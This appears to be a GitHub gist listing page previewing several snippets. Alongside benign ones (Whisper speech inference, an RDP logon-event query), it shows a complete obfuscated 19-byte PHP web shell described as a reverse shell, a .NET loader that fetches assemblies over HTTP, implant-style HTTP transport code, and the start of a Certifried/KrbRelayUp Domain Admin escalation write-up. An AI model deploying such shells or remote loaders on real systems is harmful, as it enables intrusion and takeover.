tin-z
/ VR_roadmap.md
Last active
July 5, 2024 17:06
Becoming a Vulnerability Researcher roadmap: my personal experience
sdcampbell
/ DynamicAssemblyLoader.cs
Last active
February 5, 2023 19:49
Extended Bohop's DynamicAssemblyLoader to work with any .Net assembly loaded from http/s. The original project (https://github.com/bohops/DynamicDotNet/blob/main/assembly_loader/DynamicAssemblyLoader.cs) loaded an assembly from a hard-coded path on disk.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // DynamicAssemblyLoader: A DotNet Assembly Loader using a Dynamic Method and Emitted MSIL Instructions | |
| // Author: @bohops | |
| // | |
| // "Normal" Implementation: | |
| /* | |
| Assembly assembly = Assembly.Load(assemblyBytes); | |
| assembly.EntryPoint.Invoke(obj, objArr); | |
| */ | |
| // Original author is @bohops |
0xSojalSec
/ rev_shell.php
Created
January 28, 2023 18:46
— forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |
Vaibhavs10
/ live_whisper_inference.py
Created
January 24, 2023 16:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pip install git+https://github.com/huggingface/transformers.git | |
| import datetime | |
| import sys | |
| from transformers import pipeline | |
| from transformers.pipelines.audio_utils import ffmpeg_microphone_live | |
| pipe = pipeline("automatic-speech-recognition", model="openai/whisper-base", device=0) | |
| sampling_rate = pipe.feature_extractor.sampling_rate |
awakecoding
/ Get-RdpLogonEvent.ps1
Created
September 7, 2022 01:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-RdpLogonEvent | |
| { | |
| [CmdletBinding()] | |
| param( | |
| [Int32] $Last = 10 | |
| ) | |
| $RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{ | |
| LogName='Security' | |
| ProviderName='Microsoft-Windows-Security-Auditing' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize ) | |
| { | |
| #ifdef TRANSPORT_HTTP | |
| HANDLE hConnect = NULL; | |
| HANDLE hSession = NULL; | |
| HANDLE hRequest = NULL; | |
| DWORD HttpFlags = 0; | |
| LPVOID RespBuffer = NULL; |
jaredcatkinson
/ ContextualEditDistance.ps1
Last active
February 24, 2024 15:15
This Gist is meant to be associated with a twitter thread describing a new approach to selecting the optimal set of variations given a finite set of tests. Make sure each of the associated scripts are loaded into you PowerShell session.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ContextualEditDistance | |
| { | |
| <# | |
| http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.600.3601&rep=rep1&type=pdf | |
| https://github.com/chrislit/abydos/blob/344346a5fceb6acc631b3d24e16b73a303cece2c/abydos/distance/_higuera_mico.py | |
| #> | |
| [CmdletBinding()] | |
| param( | |
| [string] |
tothi
/ certifried_with_krbrelayup.md
Last active
November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
NewerOlder